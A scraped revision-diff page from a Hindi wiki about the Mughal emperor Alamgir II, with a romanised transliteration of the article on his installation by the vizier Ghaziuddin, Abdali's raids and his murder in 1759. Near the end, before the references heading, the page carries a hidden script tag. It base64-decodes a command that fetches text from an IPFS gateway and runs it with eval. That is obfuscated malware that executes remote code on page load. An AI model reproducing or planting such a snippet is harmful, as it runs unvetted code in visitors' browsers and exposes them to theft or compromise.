Difference between revisions of "आलमगीर द्वितीय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
Line 7: Line 7:
 
इसके बाद ही [[मराठा|मराठों]] ने 1758 ई. में दिल्ली पर चढ़ाई की और [[पंजाब]] को जीतकर तैमूर को वहाँ से निकाल दिया। बादशाह आलमगीर इस सब घटनाओं का असहाय दर्शक बना रहा। जब उसने वज़ीर गाज़ीउद्दीन के नियंत्रण से अपने को मुक्त करने का प्रयास किया तो 1759 ई. में वज़ीर ने उसकी भी हत्या करवा दी। इससे पहले [[प्लासी की लड़ाई]] 1757 ई. में हो चुकी थी और उसमें [[ईस्ट इंडिया कम्पनी]] की जीत हो चुकी थी। बादशाह आलमगीर द्वितीय [[बंगाल]] को मुग़लों के क़ब्ज़े में बनाये रखने और इस प्रकार [[भारत]] में ब्रिटिश साम्राज्य की नींव न पड़ने देने के लिए कुछ न कर सका।
 
इसके बाद ही [[मराठा|मराठों]] ने 1758 ई. में दिल्ली पर चढ़ाई की और [[पंजाब]] को जीतकर तैमूर को वहाँ से निकाल दिया। बादशाह आलमगीर इस सब घटनाओं का असहाय दर्शक बना रहा। जब उसने वज़ीर गाज़ीउद्दीन के नियंत्रण से अपने को मुक्त करने का प्रयास किया तो 1759 ई. में वज़ीर ने उसकी भी हत्या करवा दी। इससे पहले [[प्लासी की लड़ाई]] 1757 ई. में हो चुकी थी और उसमें [[ईस्ट इंडिया कम्पनी]] की जीत हो चुकी थी। बादशाह आलमगीर द्वितीय [[बंगाल]] को मुग़लों के क़ब्ज़े में बनाये रखने और इस प्रकार [[भारत]] में ब्रिटिश साम्राज्य की नींव न पड़ने देने के लिए कुछ न कर सका।
  
 +
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=आधार1
 
|आधार=आधार1

Revision as of 11:26, 10 January 2011

alamagir dvitiy 16vaan mugal badashah (1754-59) tha. vah athavean mugal badashah jahaandar shah (1712-13) ka beta tha. usake vazir gaziuddin ne 1759 ee. mean usaki hatya karava di.

gaziuddin ki sazish

vazir gaziuddin ne 15vean mugal badashah ahamad shah ko andha karake gaddi se utar diya aur 1754 ee. mean alamagir dvitiy ko badashah banaya. vah chahata tha ki badashah usake hath ki kathaputali bana rahe. vah samay b di uthal-puthal ka tha.

abdali ka hamala

1756 ee. mean ahamadashah abdali ne chauthi bar hindustan par hamala kiya aur dilli ko loota. usane sindh par qabza kar liya aur apane bete taimoor ko vahaan ka shasan karane ke lie chho d diya.

alamagir ki asahayata

isake bad hi marathoan ne 1758 ee. mean dilli par chadhaee ki aur panjab ko jitakar taimoor ko vahaan se nikal diya. badashah alamagir is sab ghatanaoan ka asahay darshak bana raha. jab usane vazir gaziuddin ke niyantran se apane ko mukt karane ka prayas kiya to 1759 ee. mean vazir ne usaki bhi hatya karava di. isase pahale plasi ki l daee 1757 ee. mean ho chuki thi aur usamean eest iandiya kampani ki jit ho chuki thi. badashah alamagir dvitiy bangal ko mugaloan ke qabze mean banaye rakhane aur is prakar bharat mean british samrajy ki nianv n p dane dene ke lie kuchh n kar saka.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh